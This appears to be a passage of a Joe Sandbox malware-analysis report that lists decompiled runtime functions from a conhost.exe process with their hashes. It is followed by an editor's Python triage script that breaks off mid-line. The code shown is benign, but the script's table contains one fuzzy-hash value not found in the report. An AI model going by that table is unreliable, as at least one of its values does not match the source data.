                        				_t52 =  *_t80;
                        				if (_t52 == 0) goto 0x935d05b8;
                        				if ( *((long long*)(_t52 + 0x90)) != 0) goto 0x935d05e0;
                        				 *((long long*)(_t52 + 0x90)) = 0x935f3fa0;
                        				E00007FF67FF6935D7BF0(0x935f3fa0, _t76);
                        				_t53 =  *_t80;
                        				if (_t53 == 0) goto 0x935d05f8;
                        				if ( *((long long*)(_t53 + 0x88)) == 0) goto 0x935d0620;
                        				_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x88))));
                        				if (__rcx == _t55) goto 0x935d0708;
                        				if (_t55 == 0) goto 0x935d0708;
                        				_t56 =  *((intOrPtr*)(_t55 + 0x18));
                        				if (_t56 == 0) goto 0x935d06e0;
                        				if (__rcx != _t56) goto 0x935d0550;
                        				_t39 = _t56;
                        				if (_t39 == 0) goto 0x935d06e0;
                        				 *((intOrPtr*)(__rcx + 0x10)) =  *((intOrPtr*)(__rcx + 0x10)) - 1;
                        				if (_t39 == 0) goto 0x935d0678;
                        				_t57 =  *_t80;
                        				if (_t57 == 0) goto 0x935d0640;
                        				if ( *((long long*)(_t57 + 0x90)) == 0) goto 0x935d0659;
                        				if (_t57 == 0) goto 0x935d070f;
                        				_pop(_t81);
                        				goto E00007FF67FF6935D7C30;
                        				E00007FF67FF6935D6420();
                        				if ( *((long long*)(_t57 + 0x90)) == 0) goto 0x935d0505;
                        				if ( *_t81 != 0) goto 0x935d05e0;
                        				E00007FF67FF6935D6420();
                        				E00007FF67FF6935D7BF0( *((intOrPtr*)( *_t81 + 0x90)), _t76);
                        				_t59 =  *_t81;
                        				if (_t59 != 0) goto 0x935d0524;
                        				E00007FF67FF6935D6420();
                        				_t60 =  *_t81;
                        				if ( *((long long*)(_t59 + 0x88)) == 0) goto 0x935d0620;
                        				if (_t60 != 0) goto 0x935d0532;
                        				E00007FF67FF6935D6420();
                        				goto 0x935d0532;
                        				 *((long long*)(_t60 + 0x88)) = 0x93602368;
                        				goto 0x935d0539;
                        				asm("o16 nop [cs:eax+eax]");
                        				E00007FF67FF6935D6420();
                        				if ( *0x7FF6936023F8 != 0) goto 0x935d0594;
                        				 *((long long*)( *_t81 + 0x90)) = 0x935f3fa0;
                        				_pop(_t68);
                        				_pop(_t82);
                        				_pop(_t89);
                        				goto E00007FF67FF6935D7C30;
                        				_t16 = _t89 + 8; // 0x8
                        				_t29 = E00007FF67FF6935CFD90(_t16);
                        				if (_t68 == 0) goto 0x935d069d;
                        				 *((long long*)(_t68 + 0x18)) =  *((intOrPtr*)(_t89 + 0x18));
                        				free(??);
                        				goto 0x935d057a;
                        				_t64 =  *_t82;
                        				if (_t64 == 0) goto 0x935d0719;
                        				if ( *((long long*)(_t64 + 0x88)) != 0) goto 0x935d0738;
                        				 *((long long*)(_t64 + 0x88)) = 0x93602368;
                        				 *0x93602368 =  *((intOrPtr*)(_t89 + 0x18));
                        				goto 0x935d0690;
                        				return _t29;
			}

                        Similarity
                        • API ID:
                        • String ID: %p not found?!?!
                        • API String ID: 0-11085004
Uniqueness Score: -1.00%

                        C-Code - Quality: 25%
                        			E00007FF67FF6935CD8F0() {
                        				intOrPtr* _t8;
                        
                        				asm("movaps [esp+0x40], xmm6");
                        				asm("movaps [esp+0x50], xmm7");
                        				asm("inc esp");
                        				if ( *_t8 - 6 > 0) goto 0x935cd9dc;
                        				goto __rax;
			}

                        Similarity
                        • API ID: fprintf
                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-3474627141
Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935CD9A0() {
                        
                        				goto 0x935cd92f;
                        				goto 0x935cd92f;
                        				0;
                        				return 0;
			}

                        Similarity
                        • API ID: fprintf
                        • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-4283191376
Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935CD9B0() {
                        
                        				goto 0x935cd92f;
                        				goto 0x935cd92f;
                        				0;
                        				return 0;
                        			}



                        0x7ff6935cd9d7
                        0x7ff6935cd9e3
                        0x7ff6935cd9ee
                        0x7ff6935cd9f2

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-4064033741
                        • Opcode ID: 77bbad40f6391f2e6a681b0a3f36d2ede68e4baed7b37ba4d846b16477b37413
                        • Instruction ID: 8cc9efba11acdafe5f96e450c140e1de1912d9a77ca8c5f5769ec410cfa298c7
                        • Opcode Fuzzy Hash: 77bbad40f6391f2e6a681b0a3f36d2ede68e4baed7b37ba4d846b16477b37413
                        • Instruction Fuzzy Hash: F4F06212908F8882D6228F1DA4011FBB374FF4E789F245365EE8D76565DF29D6439700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935CD990() {
                        
                        				goto 0x935cd92f;
                        				goto 0x935cd92f;
                        				0;
                        				return 0;
                        			}



                        0x7ff6935cd9d7
                        0x7ff6935cd9e3
                        0x7ff6935cd9ee
                        0x7ff6935cd9f2

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-2713391170
                        • Opcode ID: dfa6636e9e375e9907b63d44577e77ac3a01813be521a962a8958fce02d8cdd2
                        • Instruction ID: 2b0b29b763f52d5ae004d50b27c1abb554d7e01299aeff725b7865edc95acc16
                        • Opcode Fuzzy Hash: dfa6636e9e375e9907b63d44577e77ac3a01813be521a962a8958fce02d8cdd2
                        • Instruction Fuzzy Hash: ACF0C212808F8882D2228F1CA4011FBB374FF4E789F241325EE8D76124DF28D6438300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935CD9C0() {
                        
                        				goto 0x935cd92f;
                        				goto 0x935cd92f;
                        				0;
                        				return 0;
                        			}



                        0x7ff6935cd9d7
                        0x7ff6935cd9e3
                        0x7ff6935cd9ee
                        0x7ff6935cd9f2

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-2187435201
                        • Opcode ID: 0a74dce8a9c2b7b79bd101453fbaac9d5a59d0f9eb2170a15fc9583b150580f8
                        • Instruction ID: bc1b5700f547ee9508bd344d6c6b7578da799f069b4df9c8b3ccd9a469dc694b
                        • Opcode Fuzzy Hash: 0a74dce8a9c2b7b79bd101453fbaac9d5a59d0f9eb2170a15fc9583b150580f8
                        • Instruction Fuzzy Hash: 55F06216908F8882D6228F1DA4011FBB374FF4E789F245365EE8D76165DF28D6439700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935CD9D0() {
                        
                        				goto 0x935cd92f;
                        				goto 0x935cd92f;
                        				0;
                        				return 0;
                        			}



                        0x7ff6935cd9d7
                        0x7ff6935cd9e3
                        0x7ff6935cd9ee
                        0x7ff6935cd9f2

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-4273532761
                        • Opcode ID: fff9744f9680b1120d8ff99d1331c9f72032575e2a1bc6299c96db8431976cac
                        • Instruction ID: b7c65fcb92efd37a80b6a136113bcdd04c6da6169b96ec4b7dfd92021642728d
                        • Opcode Fuzzy Hash: fff9744f9680b1120d8ff99d1331c9f72032575e2a1bc6299c96db8431976cac
                        • Instruction Fuzzy Hash: CDF06212908F8882D6228F1DA4011FBB374FF4E789F255365EE8D76525DF29D6439700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-2468659920
                        • Opcode ID: e91f10d2408dca780daf1f383b8d72a2e3011170a2ec5dc8b131a4848721aced
                        • Instruction ID: 112381ffff77e90f08efafa9d2bbf37bc4b1631184280fe5c812c272f72128d5
                        • Opcode Fuzzy Hash: e91f10d2408dca780daf1f383b8d72a2e3011170a2ec5dc8b131a4848721aced
                        • Instruction Fuzzy Hash: 45F06D22908F8882D2128F2CA4011ABB375FF4EB89F245326EE8C7A125DF28D6438700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E00007FF67FF6935E01E0(signed int __edx, void* __eflags, void* __rax, void* __rcx) {
                        				void* _t6;
                        				void* _t12;
                        				void* _t13;
                        				intOrPtr* _t15;
                        				void* _t20;
                        				void* _t21;
                        				intOrPtr* _t27;
                        				void* _t32;
                        
                        				_t21 = __rax;
                        				if (__eflags != 0) goto 0x935e0338;
                        				if (__eflags == 0) goto 0x935e027b;
                        				_t27 =  *0x93602560; // 0x0
                        				_t15 = _t27;
                        				if (_t15 == 0) goto 0x935e0368;
                        				goto 0x935e023f;
                        				if (_t15 == 0) goto 0x935e027b;
                        				if ( *_t27 == 0) goto 0x935e0290;
                        				if ((__edx >> 0x00000002 >> 0x00000001 & 0x00000001) == 0) goto 0x935e0230;
                        				_t6 = E00007FF67FF6935E0080(_t12, _t13, __rax, __rcx,  *_t27, _t32);
                        				if (_t21 == 0) goto 0x935e0360;
                        				if (__rcx == 0) goto 0x935e0300;
                        				_t20 =  *((intOrPtr*)(__rcx + 8)) - 9;
                        				if (_t20 <= 0) goto 0x935e02c0;
                        				free(??);
                        				if (_t20 != 0) goto 0x935e0234;
                        				return _t6;
                        			}
                        0x7ff6935e01e0
                        0x7ff6935e01f8
                        0x7ff6935e0204
                        0x7ff6935e0206
                        0x7ff6935e020d
                        0x7ff6935e0210
                        0x7ff6935e022a
                        0x7ff6935e0232
                        0x7ff6935e023a
                        0x7ff6935e0242
                        0x7ff6935e024a
                        0x7ff6935e0255
                        0x7ff6935e025e
                        0x7ff6935e0264
                        0x7ff6935e026a
                        0x7ff6935e0272
                        0x7ff6935e0279
                        0x7ff6935e028c

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CriticalLeaveSectionfree
                        • String ID:
                        • API String ID: 1679108487-0
                        • Opcode ID: adc6cf295aae2cf19ce611f028aa122ed7393dc6cfa836f0b9222f070bf0ebee
                        • Instruction ID: 0f76ba351b1e14b776190c84cce294e41e7e885ea8b0984b3535a20e2f82727e
                        • Opcode Fuzzy Hash: adc6cf295aae2cf19ce611f028aa122ed7393dc6cfa836f0b9222f070bf0ebee
                        • Instruction Fuzzy Hash: A7414C31A0AB13A2FA719B47D95733A2299FF0CB84F5840B5DD1DAB794DE3DA841D340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935D8910(intOrPtr* __rcx) {
                        				intOrPtr* _t6;
                        
                        				if (__rcx == 0) goto 0x935d89b0;
                        				_t6 =  *((intOrPtr*)(__rcx));
                        				if (_t6 == 0) goto 0x935d89b0;
                        				if (_t6 == 0xffffffff) goto 0x935d8a20;
                        				if ( *_t6 == 0xc0bab1fd) goto 0x935d8950;
                        				return 0x16;
                        			}




                        0x7ff6935d891c
                        0x7ff6935d8922
                        0x7ff6935d8928
                        0x7ff6935d8932
                        0x7ff6935d8943
                        0x7ff6935d894e

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeave
                        • String ID:
                        • API String ID: 3168844106-0
                        • Opcode ID: 71e6c7ade14b834ee1dff418865bf3bdb65654dd847269692b357b04037bf443
                        • Instruction ID: e2822ce4d74877ca2ab262b929fd1e055cf319c16c4623f27341a9d3f1c0edea
                        • Opcode Fuzzy Hash: 71e6c7ade14b834ee1dff418865bf3bdb65654dd847269692b357b04037bf443
                        • Instruction Fuzzy Hash: E7316173A146428AE7A5CF35D44276A33A8FB08B6CF584176CD3A9A394DF3CD885C750
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 64%
                        			E00007FF67FF6935D8C40(intOrPtr* __rcx, void* __rdx) {
                        				intOrPtr _t12;
                        				intOrPtr _t14;
                        				intOrPtr _t19;
                        				void* _t27;
                        				intOrPtr* _t28;
                        
                        				_t19 =  *__rcx;
                        				_t28 = __rcx;
                        				EnterCriticalSection(??);
                        				_t14 =  *((intOrPtr*)(_t19 + 0xc));
                        				if (_t14 == 0) goto 0x935d8cc0;
                        				 *((intOrPtr*)(_t19 + 0xc)) = _t27 - 1;
                        				LeaveCriticalSection(??);
                        				if (_t14 != 1) goto 0x935d8c9a;
                        				if (E00007FF67FF6935D7C40(1,  *((intOrPtr*)(_t19 + 0xa8)), _t19 + 0x70, _t19 + 0x98) != 0) goto 0x935d8ca7;
                        				_t12 = E00007FF67FF6935CF8A0( *((intOrPtr*)(_t28 + 8)));
                        				if (_t12 == 0) goto 0x935d8cad;
                        				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 0x10)))) = _t12;
                        				return _t12;
                        			}
                        0x7ff6935d8c4c
                        0x7ff6935d8c53
                        0x7ff6935d8c59
                        0x7ff6935d8c5f
                        0x7ff6935d8c64
                        0x7ff6935d8c6c
                        0x7ff6935d8c6f
                        0x7ff6935d8c78
                        0x7ff6935d8c98
                        0x7ff6935d8c9e
                        0x7ff6935d8ca5
                        0x7ff6935d8cab
                        0x7ff6935d8cb9

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CriticalSection$Leave$Enter$ReleaseSemaphore
                        • String ID:
                        • API String ID: 3630377130-0
                        • Opcode ID: d8f8cf3c407a1e10744407098590ea028c7fb0511c319897a0dcd75f80ae929a
                        • Instruction ID: 46ac7ac6c8f6d630b423fd7a2af24f0e6e42b9e17d36185f32314564e0bbfa1d
                        • Opcode Fuzzy Hash: d8f8cf3c407a1e10744407098590ea028c7fb0511c319897a0dcd75f80ae929a
                        • Instruction Fuzzy Hash: F3317233A0460296E721DF36D80266933A8FB49F98F5441B2DE2DEB3A4DF38E845C310
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935D87D0(intOrPtr* __rcx) {
                        				intOrPtr* _t6;
                        
                        				if (__rcx == 0) goto 0x935d8868;
                        				_t6 =  *((intOrPtr*)(__rcx));
                        				if (_t6 == 0) goto 0x935d8868;
                        				if (_t6 == 0xffffffff) goto 0x935d88d0;
                        				if ( *_t6 == 0xc0bab1fd) goto 0x935d8810;
                        				return 0x16;
                        			}




                        0x7ff6935d87da
                        0x7ff6935d87e0
                        0x7ff6935d87e6
                        0x7ff6935d87f0
                        0x7ff6935d8801
                        0x7ff6935d880a

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeave
                        • String ID:
                        • API String ID: 3168844106-0
                        • Opcode ID: ab8931bfbd3a9edb0fe1755c853049cb62c13efc9d9ebc00be137446e316cfe1
                        • Instruction ID: 87de8258bce0e6e565774b674a19c41544f6397aefd793a0334bf782ec8b7c54
                        • Opcode Fuzzy Hash: ab8931bfbd3a9edb0fe1755c853049cb62c13efc9d9ebc00be137446e316cfe1
                        • Instruction Fuzzy Hash: 43318672A046428AEB65CF35D40226933A4FB48B68F588676CD3D9A398DF38D885C710
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • EnterCriticalSection.KERNEL32(?,?,?,?,00007FF6935D8B09), ref: 00007FF6935D8506
                        • LeaveCriticalSection.KERNEL32(?,00007FF6935D8B09,?,?,?,?,?,?,?,?,?,?,?,00007FF6936023E0,?), ref: 00007FF6935D852B
                        • EnterCriticalSection.KERNEL32(?,00007FF6935D8B09,?,?,?,?,?,?,?,?,?,?,?,00007FF6936023E0,?), ref: 00007FF6935D855C
                        • LeaveCriticalSection.KERNEL32(?,00007FF6935D8B09,?,?,?,?,?,?,?,?,?,?,?,00007FF6936023E0,?), ref: 00007FF6935D8566
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeave
                        • String ID:
                        • API String ID: 3168844106-0
                        • Opcode ID: 6f5503f9c9e4779475b3fc87d2a037910102e3e55d9bf62ca4ef729959e27a63
                        • Instruction ID: cccdaa7d7fccbe9d0eb3b558860d7ddba731a4bafd7d645dca0398391f69f33d
                        • Opcode Fuzzy Hash: 6f5503f9c9e4779475b3fc87d2a037910102e3e55d9bf62ca4ef729959e27a63
                        • Instruction Fuzzy Hash: 7401F222B08A45A9EA26DB33BC42A2B2758FF88FE9F855072DD1D57310CD3CE8469300
                        Uniqueness

                        Uniqueness Score: -1.00%
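The function entries above fall into two groups that are compiler-runtime code rather than anything specific to this sample: the six `fprintf` stubs carry the default `_matherr` message of the mingw-w64 CRT, and the two `CriticalSection$EnterLeave` functions (E00007FF67FF6935D8910 and E00007FF67FF6935D87D0) test for the 0xc0bab1fd validity magic that mingw-w64 winpthreads puts in a live condition variable and return 0x16 (EINVAL) when the check fails. That attribution is the editor's, made from the strings and constants shown; the report itself names no library. The Python below is an added example, not part of the Joe Sandbox report, that tags such entries so they can be skipped and ranks each function's closest sibling by Instruction Fuzzy Hash. The entry table is constructed from this page's values, and the positional nibble comparison is an assumed stand-in for a real fuzzy-hash distance, not Joe Sandbox's own similarity metric.

```python
"""Triage of the per-function entries above: tag compiler-runtime code and
find each function's closest sibling by Instruction Fuzzy Hash.
Added example; not part of the Joe Sandbox report."""

# Constructed from the entries on this page (process 0x3A, conhost.exe image
# at 0x7FF6935C0000). "key" is a label chosen here: the decompiled function
# name where the page shows one, otherwise the _matherr message it carries.
_MATHERR = "_matherr(): %s in %s(%g, %g) (retval=%g)"
_ROWS = [
    # key, API ID, String ID, Instruction Fuzzy Hash, hex constants in the C-Code body
    ("matherr/PLOSS", "fprintf", "Partial loss of significance (PLOSS)$" + _MATHERR,
     "33F06212908F8882D6228F1DA4011FBB374FF4E789F245365EE8D76565DF29D6439700", ()),
    ("matherr/OVERFLOW", "fprintf", "Overflow range error (OVERFLOW)$" + _MATHERR,
     "F4F06212908F8882D6228F1DA4011FBB374FF4E789F245365EE8D76565DF29D6439700", ()),
    ("matherr/DOMAIN", "fprintf", "Argument domain error (DOMAIN)$" + _MATHERR,
     "ACF0C212808F8882D2228F1CA4011FBB374FF4E789F241325EE8D76124DF28D6438300", ()),
    ("matherr/UNDERFLOW", "fprintf",
     "The result is too small to be represented (UNDERFLOW)$" + _MATHERR,
     "55F06216908F8882D6228F1DA4011FBB374FF4E789F245365EE8D76165DF28D6439700", ()),
    ("matherr/TLOSS", "fprintf", "Total loss of significance (TLOSS)$" + _MATHERR,
     "CDF06212908F8882D6228F1DA4011FBB374FF4E789F255365EE8D76525DF29D6439700", ()),
    ("matherr/SIGN", "fprintf", "Argument singularity (SIGN)$" + _MATHERR,
     "45F06D22908F8882D2128F2CA4011ABB375FF4EB89F245326EE8C7A125DF28D6438700", ()),
    ("E00007FF67FF6935E01E0", "CriticalLeaveSectionfree", "",
     "A7414C31A0AB13A2FA719B47D95733A2299FF0CB84F5840B5DD1DAB794DE3DA841D340", ()),
    ("E00007FF67FF6935D8910", "CriticalSection$EnterLeave", "",
     "E7316173A146428AE7A5CF35D44276A33A8FB08B6CF584176CD3A9A394DF3CD885C750",
     ("0xffffffff", "0xc0bab1fd", "0x16")),
    ("E00007FF67FF6935D8C40", "CriticalSection$Leave$Enter$ReleaseSemaphore", "",
     "F3317233A0460296E721DF36D80266933A8FB49F98F5441B2DE2DEB3A4DF38E845C310", ()),
    ("E00007FF67FF6935D87D0", "CriticalSection$EnterLeave", "",
     "43318672A046428AEB65CF35D40226933A4FB48B68F588676CD3D9A398DF38D885C710",
     ("0xffffffff", "0xc0bab1fd", "0x16")),
]
# Joe Sandbox joins several strings of one function with "$"; split them back out.
ENTRIES = [
    {"key": k, "api": a, "strings": s.split("$") if s else [],
     "fuzzy": f, "consts": frozenset(c)}
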